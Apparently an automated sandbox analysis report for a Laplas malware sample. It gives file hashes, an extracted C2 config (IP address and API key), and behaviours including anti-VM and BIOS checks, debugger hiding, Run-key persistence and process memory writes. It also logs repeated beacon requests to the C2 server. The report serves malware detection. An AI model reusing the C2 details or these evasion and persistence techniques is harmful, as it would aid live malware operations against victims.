Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
270s -
max time network
286s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
21/07/2023, 00:18 UTC
Static task
static1
Behavioral task
behavioral1
Sample
613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Resource
win7-20230712-en
General
-
Target
613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
-
Size
3.2MB
-
MD5
4472444218925ed8fd4982f141af1978
-
SHA1
101ff99cec2f571002915f23290d495671967db3
-
SHA256
613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c
-
SHA512
b2255bced17a9cf9ab8afb461cea7005d2df77984f3122609d82d9a2f7f5ec3ca23ee8f20f609e60937db134ef721bf90fd759ddbe4df9acbf6216d8d2e15cff
-
SSDEEP
98304:iiuvmFRChTCXAVCAujVcbeyLwQ5ltcD6VIl:VRI8AaadcDhl
Malware Config
Extracted
laplas
http://168.100.10.236
-
api_key
f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe -
Executes dropped EXE 1 IoCs
pid Process 2580 ntlhost.exe -
Loads dropped DLL 1 IoCs
pid Process 1700 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1700 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe 2580 ntlhost.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 2 Go-http-client/1.1 -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1700 wrote to memory of 2580 1700 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe 28 PID 1700 wrote to memory of 2580 1700 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe 28 PID 1700 wrote to memory of 2580 1700 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe"C:\Users\Admin\AppData\Local\Temp\613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2580
-
Network
-
Remote address:168.100.10.236:80RequestGET /bot/regex HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:18:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Adminntlhost.exeRemote address:168.100.10.236:80RequestGET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:18:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:168.100.10.236:80RequestGET /bot/regex HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:20:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Adminntlhost.exeRemote address:168.100.10.236:80RequestGET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:20:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:168.100.10.236:80RequestGET /bot/regex HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:21:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Adminntlhost.exeRemote address:168.100.10.236:80RequestGET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:21:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:168.100.10.236:80RequestGET /bot/regex HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:22:16 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Adminntlhost.exeRemote address:168.100.10.236:80RequestGET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:22:16 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
Remote address:168.100.10.236:80RequestGET /bot/regex HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:23:23 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
-
GEThttp://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Adminntlhost.exeRemote address:168.100.10.236:80RequestGET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:23:23 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
-
168.100.10.236:80http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Adminhttpntlhost.exe2.7kB 6.6kB 27 31
HTTP Request
GET http://168.100.10.236/bot/regexHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\AdminHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/regexHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\AdminHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/regexHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\AdminHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/regexHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\AdminHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/regexHTTP Response
200HTTP Request
GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\AdminHTTP Response
200
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
728.2MB
MD5c03a56a67a089c6c0ed7cc93654ae263
SHA116113fdafe44cfcc4a93507f3602b9f7652ae976
SHA25626892056ce7e92cf839c76b09a2caa4510f326d812a6677c2f5dc3e61900b45e
SHA51202ccd1e7fc5c7564e2fc6587d495c83da61df5319cb9bbdc38c81371dbdafa2c3bfc7360831c79d0a654d9adf443aece6dd9b5c11d4b83ce177e4caf7c7a0400
-
Filesize
728.2MB
MD5c03a56a67a089c6c0ed7cc93654ae263
SHA116113fdafe44cfcc4a93507f3602b9f7652ae976
SHA25626892056ce7e92cf839c76b09a2caa4510f326d812a6677c2f5dc3e61900b45e
SHA51202ccd1e7fc5c7564e2fc6587d495c83da61df5319cb9bbdc38c81371dbdafa2c3bfc7360831c79d0a654d9adf443aece6dd9b5c11d4b83ce177e4caf7c7a0400